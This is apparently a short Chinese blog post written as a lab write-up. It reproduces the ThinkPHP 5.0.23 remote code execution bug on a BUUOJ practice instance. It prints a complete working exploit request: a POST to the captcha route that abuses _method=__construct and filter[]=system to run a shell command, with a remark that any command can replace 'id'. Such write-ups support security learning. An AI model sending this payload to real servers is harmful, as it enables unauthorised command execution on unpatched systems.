[ThinkPHP]5.0.23-Rce

环境搭建

github传送门

BUU传送门

POC

老懒狗选择直接buu，链接

http://node3.buuoj.cn:27512/

1

直接用poc打一下：

POST /index.php?s=captcha HTTP/1.1

Host: node3.buuoj.cn:27512

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

1

2

3

4

5

6

7

8

9

10

11

直接在burp的repeater模块里面构造就行了：

exp

这里直接修改id即可，id处可以执行任意代码。

————————————————

版权声明：本文为CSDN博主「imbia」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。

原文链接：https://blog.csdn.net/satasun/article/details/110818672